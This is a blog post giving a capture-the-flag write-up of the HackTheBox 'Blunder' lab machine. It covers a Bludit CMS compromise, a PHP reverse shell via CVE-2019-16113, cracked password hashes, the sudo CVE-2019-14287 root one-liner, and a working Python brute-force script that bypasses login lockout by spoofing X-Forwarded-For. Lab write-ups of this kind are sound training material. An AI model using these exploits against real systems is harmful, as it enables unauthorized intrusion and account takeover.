<!doctype html>
<html lang="en-us">
  <head>
    <title>HTB - Blunder // SixPraxis</title>
    <link rel="shortcut icon" href="/images/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.82.0" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="SixPraxis" />
    <meta name="description" content="Write Up for HackTheBox&#39;s Blunder" />
    <link rel="stylesheet" href="https://sixpraxis.github.io/css/main.min.802b52396e9009f466997720acea24d1773f8e6e5db6e4793067fa2dfd981e02.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="HTB - Blunder"/>
<meta name="twitter:description" content="Write Up for HackTheBox&#39;s Blunder"/>

    <meta property="og:title" content="HTB - Blunder" />
<meta property="og:description" content="Write Up for HackTheBox&#39;s Blunder" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://sixpraxis.github.io/posts/blunder/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-04-06T00:00:00&#43;00:00" />
<meta property="article:modified_time" content="2021-04-06T00:00:00&#43;00:00" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://sixpraxis.github.io"><img class="app-header-avatar" src="/images/avatar.png" alt="SixPraxis" /></a>
      <h1>SixPraxis</h1>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
             - 
          
          <a class="app-header-menu-item" href="/tags/">Tags</a>
      </nav>
      <p>Mostly interested in networking and cyber security, but into all sorts of things.</p>
      <div class="app-header-social">
        
          <a href="https://github.com/sixpraxis" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
          <a href="https://app.hackthebox.eu/profile/139574" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-htb">
  <title>HackTheBox</title>
  <path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#626262"/>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">HTB - Blunder</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Apr 6, 2021
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          4 min read
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7.01" y2="7"></line>
</svg>
              <a class="tag" href="https://sixpraxis.github.io/tags/hackthebox/">hackthebox</a>
              <a class="tag" href="https://sixpraxis.github.io/tags/blunder/">blunder</a>
              <a class="tag" href="https://sixpraxis.github.io/tags/easy/">easy</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <p><img src="/images/htb-blunder/blunder.png" alt="Blunder"></p>
<h1 id="blunder">Blunder</h1>
<h4 id="101010191">10.10.10.191</h4>
<p>by SixPraxis</p>
<h3 id="write-up">Write-Up</h3>
<p>Initial recon shows one open port running an HTML service. Inspection reveals a blog running on Bludit CMS v3.9.2. Known exploits for this platform include an authentication brute force mitigation bypass and an authenticated code execution. Fuzzing found a todo.txt, which has the name fergus in it. After creating a brute force script and making no progress, we notice that in the Stephen King blog post there is a name that is oddly unspaced. Trying fergus as a user, with RolandDeschain as the password gets us in to the admin dashboard.</p>
<p><img src="/images/htb-blunder/oddtext.png" alt="oddtext"></p>
<p>Using CVE-2019-16113 we upload a php reverse shell and get a connection back to our own machine as www-data. We find two versions of bludit installed, the newer version&rsquo;s user database contains a SHA-1 hashed password for hugo. We upgrade our shell using python <code>python -c 'import pty; pty.spawn(&quot;/bin/bash&quot;)'</code> and then issue <code>su hugo</code>. We can now access the user flag in hugo&rsquo;s home directory.</p>
<p><img src="/images/htb-blunder/userflag.png" alt="userflag"></p>
<p>Using sudo -l shows us that we can execute /bin/sh as any user except root. After falling down a ton of rabbit holes, we finally google &ldquo;sudo /bin/bash priv esc&rdquo; and find CVE 2019-14287. That CVE exploits a bug in sudo that allows you to run anything as root when root is explicitly stated as the only user that you can not run sudo as. <code>sudo -u#-1 /bin/bash</code> Sudo only checks that the user is not equal to 0, then -1 defaults to user 0, spawning our shell as root.</p>
<p><img src="/images/htb-blunder/sudoexploit.png" alt="sudoexploit"></p>
<p><img src="/images/htb-blunder/rootflag.png" alt="rootflag"></p>
<h3 id="recon">Recon</h3>
<h5 id="nmap">NMAP</h5>
<pre><code>PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
</code></pre><h6 id="port-80--http">Port 80 : HTTP</h6>
<p>Blog format website with a few posts and an about page. Wfuzz finds an admin page and the source code for it tells us that the site is built on Bludit CMS v3.9.2.</p>
<h6 id="wfuzz">WFuzz</h6>
<pre><code>wfuzz -u http://target.htb/FUZZFUZ2Z -z file,common.txt -z file,/usr/share/wordlists/dirb/extensions_common.txt --hc 404,301 -c

===================================================================
ID           Response   Lines    Word     Chars       Payload                                   
===================================================================

000000030:   200        170 L    918 W    7561 Ch     &quot;0&quot;                                       
000002698:   200        105 L    303 W    3280 Ch     &quot;about&quot;                                   
000004553:   200        70 L     157 W    2385 Ch     &quot;admin - /&quot;                               
000053157:   403        9 L      28 W     275 Ch      &quot;icons - /&quot;                               
000055932:   200        0 L      5 W      30 Ch       &quot;install - .php&quot;                          
000062409:   200        21 L     171 W    1083 Ch     &quot;LICENSE&quot;                                 
000095872:   200        1 L      4 W      22 Ch       &quot;robots - .txt&quot;                           
000095875:   200        1 L      4 W      22 Ch       &quot;robots.txt&quot;                              
000100283:   403        9 L      28 W     275 Ch      &quot;server-status&quot;                           
000100311:   403        9 L      28 W     275 Ch      &quot;server-status - /&quot;                       
000114548:   200        4 L      23 W     118 Ch      &quot;todo - .txt&quot;           
</code></pre><hr>
<h3 id="credentials">Credentials</h3>
<h5 id="admin-dashboardtargethtbadmin">Admin Dashboard(target.htb/admin/)</h5>
<pre><code>fergus : RolandDeschain
</code></pre><h5 id="user-database-for-active-bludit">User database for active bludit</h5>
<pre><code>    &quot;admin&quot;: {
        &quot;nickname&quot;: &quot;Admin&quot;,
        &quot;firstName&quot;: &quot;Administrator&quot;,
        &quot;lastName&quot;: &quot;&quot;,
        &quot;role&quot;: &quot;admin&quot;,
        &quot;password&quot;: &quot;bfcc887f62e36ea019e3295aafb8a3885966e265&quot;,
        &quot;salt&quot;: &quot;5dde2887e7aca&quot;,
        
     &quot;fergus&quot;: {
        &quot;firstName&quot;: &quot;&quot;,
        &quot;lastName&quot;: &quot;&quot;,
        &quot;nickname&quot;: &quot;&quot;,
        &quot;description&quot;: &quot;&quot;,
        &quot;role&quot;: &quot;author&quot;,
        &quot;password&quot;: &quot;be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7&quot;,
        &quot;salt&quot;: &quot;jqxpjfnv&quot;,
</code></pre><h5 id="user-database-file-for-undeployed-version-of-bludit">User database file for undeployed version of bludit</h5>
<pre><code>&quot;admin&quot;: {
        &quot;nickname&quot;: &quot;Hugo&quot;,
        &quot;firstName&quot;: &quot;Hugo&quot;,
        &quot;lastName&quot;: &quot;&quot;,
        &quot;role&quot;: &quot;User&quot;,
        &quot;password&quot;: &quot;faca404fd5c0a31cf1897b823c695c85cffeb98d&quot;,
</code></pre><p>DECRYPTED: Password120</p>
<h3 id="notes">Notes</h3>
<p>Possible fergus user <code>todo.txt: -Inform fergus that the new blog needs images - PENDING</code></p>
<p>CVE-2019-16113 MSF module: linux/http/bludit_upload_images_exec</p>
<h5 id="bluditbrutepy">BluditBrute.py</h5>
<p>Brute force script I created to abuse the brute force mitigation bypass.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#75715e">#/bin/python3</span>
<span style="color:#f92672">import</span> requests
<span style="color:#f92672">import</span> re

url <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;http://target.htb/admin/&#39;</span>
username <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;admin&#39;</span>
wordlist <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;cewl1.txt&#39;</span>
<span style="color:#75715e">#failCon = &#39;Username or password incorrect&#39;</span>
password <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;test&#39;</span>
reg <span style="color:#f92672">=</span> re<span style="color:#f92672">.</span>compile(<span style="color:#e6db74">&#39;name=</span><span style="color:#ae81ff">\&#34;</span><span style="color:#e6db74">tokenCSRF</span><span style="color:#ae81ff">\&#34;</span><span style="color:#e6db74"> value=</span><span style="color:#ae81ff">\&#34;</span><span style="color:#e6db74">([\w\d]+)</span><span style="color:#ae81ff">\&#34;</span><span style="color:#e6db74">&gt;&#39;</span>)

<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">buildPost</span>(line, token):
    data <span style="color:#f92672">=</span> {<span style="color:#e6db74">&#39;tokenCSRF&#39;</span>: token,
            <span style="color:#e6db74">&#39;username&#39;</span>: username,
            <span style="color:#e6db74">&#39;password&#39;</span>: line,
            <span style="color:#e6db74">&#39;save&#39;</span>:<span style="color:#e6db74">&#39;&#39;</span>}
    <span style="color:#66d9ef">return</span> data

file <span style="color:#f92672">=</span> open(wordlist, <span style="color:#e6db74">&#34;r&#34;</span>)
counter <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>

<span style="color:#66d9ef">for</span> line <span style="color:#f92672">in</span> file:
    line <span style="color:#f92672">=</span> line<span style="color:#f92672">.</span>strip()
    res <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(url)
    <span style="color:#66d9ef">print</span>(<span style="color:#e6db74">&#34;** &#34;</span> <span style="color:#f92672">+</span> str(counter) <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34; - Trying: &#34;</span> <span style="color:#f92672">+</span> line <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34; **&#34;</span>)
    <span style="color:#66d9ef">if</span> res<span style="color:#f92672">.</span>status_code <span style="color:#f92672">==</span> <span style="color:#ae81ff">200</span>:
        bluditCookie <span style="color:#f92672">=</span> res<span style="color:#f92672">.</span>cookies[<span style="color:#e6db74">&#39;BLUDIT-KEY&#39;</span>]
        token <span style="color:#f92672">=</span> reg<span style="color:#f92672">.</span>search(res<span style="color:#f92672">.</span>text)<span style="color:#f92672">.</span>group(<span style="color:#ae81ff">1</span>)
        res <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>post(url, data <span style="color:#f92672">=</span> buildPost(line, token), headers<span style="color:#f92672">=</span>{<span style="color:#e6db74">&#39;X-Forwarded-For&#39;</span>:str(counter)}, cookies<span style="color:#f92672">=</span>{<span style="color:#e6db74">&#39;BLUDIT-KEY&#39;</span>:bluditCookie})
        counter <span style="color:#f92672">+=</span> <span style="color:#ae81ff">1</span>
        <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#39;dashboard&#39;</span> <span style="color:#f92672">in</span> res<span style="color:#f92672">.</span>url:
            <span style="color:#66d9ef">print</span>(<span style="color:#e6db74">&#39;Password found!: &#39;</span> <span style="color:#f92672">+</span> line)
            successFile <span style="color:#f92672">=</span> open(<span style="color:#e6db74">&#34;bluditPassword.txt&#34;</span>, <span style="color:#e6db74">&#34;w&#34;</span>)
            successFile<span style="color:#f92672">.</span>write(username <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34; : &#34;</span> <span style="color:#f92672">+</span> line)
            successFile<span style="color:#f92672">.</span>close()
            <span style="color:#66d9ef">break</span>

</code></pre></div>
    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
